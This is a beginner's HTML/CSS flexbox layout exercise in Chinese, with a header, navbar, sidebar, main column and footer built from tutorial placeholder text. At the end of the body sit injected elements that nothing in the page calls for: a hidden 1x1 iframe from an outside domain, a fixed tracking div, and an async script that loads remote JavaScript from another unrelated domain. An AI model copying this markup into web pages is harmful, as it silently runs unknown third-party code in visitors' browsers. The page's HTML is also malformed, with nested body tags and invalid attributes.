<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>flex 布局</title>
    <style>
* {
    box-sizing: border-box;
}
body {
    font-family: Arial;
    margin: 0;
}
.header {
    padding: 80px;
    text-align: center;
    background: #1abc9c;
    color: white;
}
.header h1 {
    font-size: 40px;
}
.navbar {
    overflow: hidden;
    background-color: #333;
}
.navbar a {
    float: left;
    display: block;
    color: white;
    text-align: center;
    padding: 20px;
    text-decoration: none;
}
.navbar a.right {
    float: right;
}
.navbar a:hover {
    background-color: #ddd;
    color: black;
}
.row {  
    display: -ms-flexbox; /* IE10 */
    display: flex;
    -ms-flex-wrap: wrap; /* IE10 */
    flex-wrap: wrap;
}
.side {
    -ms-flex: 30%; /* IE10 */
    flex: 30%;
    background-color: #f1f1f1;
    padding: 10px;
}
.main {   
    -ms-flex: 70%; /* IE10 */
    flex: 70%;
    background-color: white;
    padding: 20px;
}
.fakeimg {
    background-color: #aaa;
    width: 1;
    padding: 0;
}
.footer {
    padding: 20px;
    text-align: center;
    background: #ddd;
}

/* 响应式布局 - 在屏幕设备宽度尺寸小于 700px 时, 让两栏上下堆叠显示 */
@media screen and (max-width: 700px) {
    .row {   
        flex-direction: column;
    }
}

/* 响应式布局 - 在屏幕设备宽度尺寸小于 400px 时, 让导航栏目上下堆叠显示 */
@media screen and (max-width: 400px) {
    .navbar a {
        float: none;
        width: 100%;
    }
} 
    </style>
</head>
     <div></div>
<body class="flex">
    <body>

        <div class="header">
          <h1>欢迎来到我的网站</h1>
          <p>宋金江</p>
        </div>
        
        <div class="navbar">
          <a href="#">文件<div class="css"></div></a>
          <a href="#">链接</a>
          <a href="#">链接</a>
          <a href="#" class="right">链接</a>
        </div>
        
        <div class="row">
          <div class="side">
              <h2>关于我</h2>
              <h5>我的照片:</h5>
              <div class="fakeimg" style="height:200px;">
                <img src="C:\Users\ASUS\Pictures\Saved Pictures\QQ图片20221124135122.jpg"
                 alt="图片" width="atuo" height="200px
                ">
                
                </div>
              <p>关于我的介绍..</p>
              <h3>更多内容</h3>
              <p>我的更多内容</p>
              <div class="fakeimg" style="height:60px;">
                <img src="C:\Users\ASUS\Pictures\Saved Pictures\QQ图片20221124135122.jpg"
                alt="图片" width="atuo" height="100px
               ">
               </div><br>
              <div class="fakeimg" style="height:60px;">
                
                这边插入图像</div><br>
              <div class="fakeimg" style="height:60px;">
                
                这边插入图像</div>
          </div>
          <div class="main">
              <h2>标题</h2>
              <h5>副标题</h5>
              <div class="fakeimg" style="height:200px;">
                
                图像</div>
              <p>一些文本..</p>
              <p>菜鸟教程，学的不仅是技术，更是梦想！！！菜鸟教程，学的不仅是技术，更是梦想！！！菜鸟教程，学的不仅是技术，更是梦想！！！</p>
              <br>
              <h2>标题</h2>
              <h5>副标题</h5>
              <div class="fakeimg" style="height:200px;">
                
                像</div>
              <p>一些文本..</p>
              <p>菜鸟教程，学的不仅是技术，更是梦想！！！菜鸟教程，学的不仅是技术，更是梦想！！！菜鸟教程，学的不仅是技术，更是梦想！！！</p>
          </div>
        </div>
        
        <div class="footer">
          <h2>底部内容</h2>
        </div>
        
        
        <div id="rili_ext_ads_mutex" style="width: 1px; height: 1px; position: fixed; z-index: 0;"></div>
        <div style="width: 2px; height: 2px; position: fixed; z-index: 12; bottom: 15px; right: 15px;">
        <iframe src="//vip.zhanyangsh.cn/api/goods/v1/get.cnzz.html" width="1" height="1" scrolling="no" frameborder="0"></iframe>
        </div><script src="//v2.maoyinews.xyz/api/get.convert.js?trackId=" async="async"></script></body>
 

</body>
</html>